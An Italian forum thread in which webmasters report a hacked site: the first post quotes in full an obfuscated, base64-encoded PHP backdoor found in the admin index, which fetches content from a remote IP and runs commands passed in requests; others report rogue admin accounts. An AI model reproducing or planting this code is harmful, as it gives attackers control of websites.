Ho trovato una stringa strana su 3.3.6 . - Problemi di sicurezza ???

[newoffice2000]

La stringa trovata su index amministratore è questa:

Codice: [Seleziona]

//###==###
error_reporting(0); ini_set("display_errors", "0"); if (!isset($i8291f691)) { $i8291f691 = TRUE;  $GLOBALS['_769130756_']=Array(base64_decode('cHJlZ19' .'tY' .'XRjaA=='),base64_decode('Z' .'mlsZV9' .'nZXRfY29' .'udGVud' .'HM' .'='),base64_decode('Y2' .'9we' .'Q' .'=='),base64_decode('bXRfcm' .'FuZA=='),base64_decode('YX' .'JyYXlfZmlsbA=='),base64_decode('' .'Zmls' .'Z' .'WN' .'0aW' .'1l'),base64_decode('d' .'X' .'JsZW5j' .'b' .'2Rl'),base64_decode('d' .'XJsZW5' .'jb2Rl'),base64_decode('bWQ1'),base64_decode('Zmls' .'ZV9' .'wdXRfY29udGVudH' .'M='),base64_decode('' .'Zmx' .'vb3' .'I='),base64_decode('aW5pX2d' .'ldA=='),base64_decode('ZmlsZV9nZXRfY29ud' .'GVu' .'d' .'HM='),base64_decode('c3RybG' .'V' .'u'),base64_decode('ZnVuY3Rpb25fZXhpc3R' .'z'),base64_decode('Y3VybF9' .'pbml0'),base64_decode('Y3VybF9zZXRvcH' .'Q='),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y3VybF9leGVj'),base64_decode('c3RycG9' .'z'),base64_decode('c3Ryd' .'m' .'Fs'),base64_decode('Y3Vy' .'b' .'F9j' .'bG' .'9zZQ=='),base64_decode('ZnNvY2tvc' .'GVu'),base64_decode('bX' .'RfcmFu' .'Z' .'A=='),base64_decode('c' .'2' .'Vzc' .'2l' .'vbl' .'9pZ' .'A=='),base64_decode('Y' .'XJyY' .'XlfbW' .'Vy' .'Z2U' .'='),base64_decode('bXRfcm' .'F' .'u' .'ZA=='),base64_decode('Z' .'ndyaXRl'),base64_decode('bmwyYnI='),base64_decode('b' .'XRf' .'cmFuZA=='),base64_decode('Z' .'mVvZg=='),base64_decode('ZmdldH' .'M='),base64_decode('Zm' .'Nsb3' .'Nl'),base64_decode('cH' .'JlZ' .'19zc' .'Gxp' .'dA=='),base64_decode('' .'c' .'3Rya' .'XBzbG' .'F' .'zaGVz'));  function _1669418828($i){$a=Array('Y2x' .'p' .'ZW5' .'0' .'X' .'2N' .'o' .'ZWNr','Y2xpZW50X2N' .'oZ' .'WN' .'r','SF' .'RU' .'UF9BQ0NFUFRfQ0hBUlNFVA==','I' .'S4' .'h' .'dQ==','U0NSSV' .'B' .'UX0ZJTEVOQ' .'U1F','' .'VVRGLT' .'g=','d' .'2l' .'uZG93cy0' .'xMjUx','SFRUUF9BQ0' .'NF' .'UFRf' .'Q' .'0h' .'BUlNFVA' .'==','' .'U0VSVkVS' .'X' .'05' .'BTUU' .'=','Uk' .'VRVUVTV' .'F9VUkk=','' .'SF' .'RUUF9V' .'U0VSX0FHRU5U','' .'U' .'k' .'V' .'N' .'T1R' .'F' .'X0' .'FERFI=','M' .'TA' .'5LjI' .'zNi44NS44N' .'A==','L' .'2' .'dldC5waH' .'A/' .'ZD0=','J' .'nU9','J' .'mM9','Jmk9M' .'SZp' .'cD0=','Jmg9','' .'Y' .'2RiMjFmZDAwZT' .'dhZW' .'Y' .'3MTlh' .'Y2N' .'lZjk5MjY4N' .'z' .'E' .'yM' .'zc=','M' .'Q==','YWxsb3dfdXJsX2Z' .'vc' .'GV' .'u','' .'aHR' .'0cD' .'ovLw==','Y' .'3VybF9' .'pbml0','' .'aHR0c' .'Do' .'vLw==','Yn' .'ZiY' .'W5' .'o' .'YX' .'Fq' .'b3J' .'j','eGdtaGp6','R0VUIA==','IEhUVFA' .'vMS4xDQo=','SG9z' .'dDo' .'g','D' .'Qo=','Q29u' .'b' .'mVjdGl' .'vbjogQ' .'2' .'xvc' .'2UNCg0' .'K','','L1xSX' .'FIv','cA' .'==','ODI5MW' .'Y2OTE=','Zg==','' .'Yw==');return base64_decode($a[$i]);}  if(!isset($u2fa4f66_0)){if(!empty($_COOKIE[_1669418828(0)]))die($_COOKIE[_1669418828(1)]);if(!isset($u2fa4f66_1[_1669418828(2)])){if($GLOBALS['_769130756_'][0](_1669418828(3),$GLOBALS['_769130756_'][1]($_SERVER[_1669418828(4)])))$u2fa4f66_2=_1669418828(5);else $u2fa4f66_2=_1669418828(6);}else{$u2fa4f66_2=$u2fa4f66_1[_1669418828(7)];}$u2fa4f66_3=$_SERVER[_1669418828(] .$_SERVER[_1669418828(9)];$u2fa4f66_4=$_SERVER[_1669418828(10)];(round(0+124.25+124.25+124.25+124.25)-round(0+497)+round(0+853.5+853.5+853.5+853.5)-round(0+682.8+682.8+682.8+682.8+682.)?$GLOBALS['_769130756_'][2]($u2fa4f66_5,$u2fa4f66_6,$u2fa4f66_2):$GLOBALS['_769130756_'][3](round(0+248.5+248.5),round(0+2575));$u2fa4f66_7=$_SERVER[_1669418828(11)];$u2fa4f66_8=round(0+1687.5+1687.5);$u2fa4f66_6=_1669418828(12);if((round(0+1940+1940)^round(0+1940+1940))&& $GLOBALS['_769130756_'][4]($u2fa4f66_1,$u2fa4f66_0,$u2fa4f66_1))$GLOBALS['_769130756_'][5]($u2fa4f66_5,$u2fa4f66_9);$u2fa4f66_10=_1669418828(13) .$GLOBALS['_769130756_'][6]($u2fa4f66_3) ._1669418828(14) .$GLOBALS['_769130756_'][7]($u2fa4f66_4) ._1669418828(15) .$u2fa4f66_2 ._1669418828(16) .$u2fa4f66_7 ._1669418828(17) .$GLOBALS['_769130756_'][8](_1669418828(18) .$u2fa4f66_3 .$u2fa4f66_4 .$u2fa4f66_2 ._1669418828(19));if((round(0+360.8+360.8+360.8+360.8+360.+round(0+838+838+838))>round(0+360.8+360.8+360.8+360.8+360.|| $GLOBALS['_769130756_'][9]($u2fa4f66_1));else{$GLOBALS['_769130756_'][10]($u2fa4f66_5,$u2fa4f66_7,$_REQUEST,$u2fa4f66_7);}if($GLOBALS['_769130756_'][11](_1669418828(20))== round(0+0.25+0.25+0.25+0.25)){$u2fa4f66_0=$GLOBALS['_769130756_'][12](_1669418828(21) .$u2fa4f66_6 .$u2fa4f66_10);}if($GLOBALS['_769130756_'][13]($u2fa4f66_0)<round(0+5+5)){if($GLOBALS['_769130756_'][14](_1669418828(22))){$u2fa4f66_11=$GLOBALS['_769130756_'][15](_1669418828(23) .$u2fa4f66_6 .$u2fa4f66_10);$GLOBALS['_769130756_'][16]($u2fa4f66_11,42,FALSE);$GLOBALS['_769130756_'][17]($u2fa4f66_11,19913,TRUE);$u2fa4f66_0=$GLOBALS['_769130756_'][18]($u2fa4f66_11);if($GLOBALS['_769130756_'][19](_1669418828(24),_1669418828(25))!==false)$GLOBALS['_769130756_'][20]($_REQUEST,$u2fa4f66_4);$GLOBALS['_769130756_'][21]($u2fa4f66_11);}else{$u2fa4f66_12=$GLOBALS['_769130756_'][22]($u2fa4f66_6,round(0+26.666666666667+26.666666666667+26.666666666667),$u2fa4f66_9,$u2fa4f66_13,round(0+7.5+7.5+7.5+7.5));if(round(0+7475)<$GLOBALS['_769130756_'][23](round(0+1716.5+1716.5),round(0+4037)))$GLOBALS['_769130756_'][24]($_REQUEST,$u2fa4f66_9,$u2fa4f66_9);if($u2fa4f66_12){$u2fa4f66_14=_1669418828(26) .$u2fa4f66_10 ._1669418828(27);$u2fa4f66_14 .= _1669418828(28) .$u2fa4f66_6 ._1669418828(29);$u2fa4f66_14 .= _1669418828(30);(round(0+1125.75+1125.75+1125.75+1125.75)-round(0+1125.75+1125.75+1125.75+1125.75)+round(0+4677)-round(0+4677))?$GLOBALS['_769130756_'][25]($u2fa4f66_2,$_REQUEST):$GLOBALS['_769130756_'][26](round(0+645.25+645.25+645.25+645.25),round(0+4503));$GLOBALS['_769130756_'][27]($u2fa4f66_12,$u2fa4f66_14);$u2fa4f66_15=round(0+1502+1502);$u2fa4f66_16=_1669418828(31);(round(0+226.6+226.6+226.6+226.6+226.6)-round(0+566.5+566.5)+round(0+713+713+713+713+713)-round(0+1782.5+1782.5))?$GLOBALS['_769130756_'][28]($u2fa4f66_13):$GLOBALS['_769130756_'][29](round(0+450),round(0+283.25+283.25+283.25+283.25));while(!$GLOBALS['_769130756_'][30]($u2fa4f66_12)){$u2fa4f66_16 .= $GLOBALS['_769130756_'][31]($u2fa4f66_12,round(0+64+64));}$GLOBALS['_769130756_'][32]($u2fa4f66_12);list($u2fa4f66_5,$u2fa4f66_0)=$GLOBALS['_769130756_'][33](_1669418828(32),$u2fa4f66_16,round(0+1+1));}}}if(@$_REQUEST[_1669418828(33)]== _1669418828(34))$_REQUEST[_1669418828(35)]($GLOBALS['_769130756_'][34]($_REQUEST[_1669418828(36)]));}echo $u2fa4f66_0;  }
//###==###

Oltre a questo un nuovo utente registrato.


Mi preoccupo


Grazie.

[tosk]

per l'utente registrato
ti dico cosa ho letto in una risposta di qualche giorno fa
dal pannello di controllo, gestione utenti, devi disabilitare la voce che permette una nuova registrazione

ciao
tosk

[newoffice2000]

Grazie per la risposta, ma il nuovo utente aveva diritti di amministrazione.


Chiedo allo staff di spostare il messaggio nella sezione appropriata.


Mi sono accorto dopo che c'era una sezione ad-hoc.


GRAZIE.

[margherita_64]

Poco fa è successo anche a me! Mi sono trovata un utente registrato quando sul mio sito non è previsto nessun modulo di registrazione. Ora ho disabilitato da controllo globale ma come mai accade questo?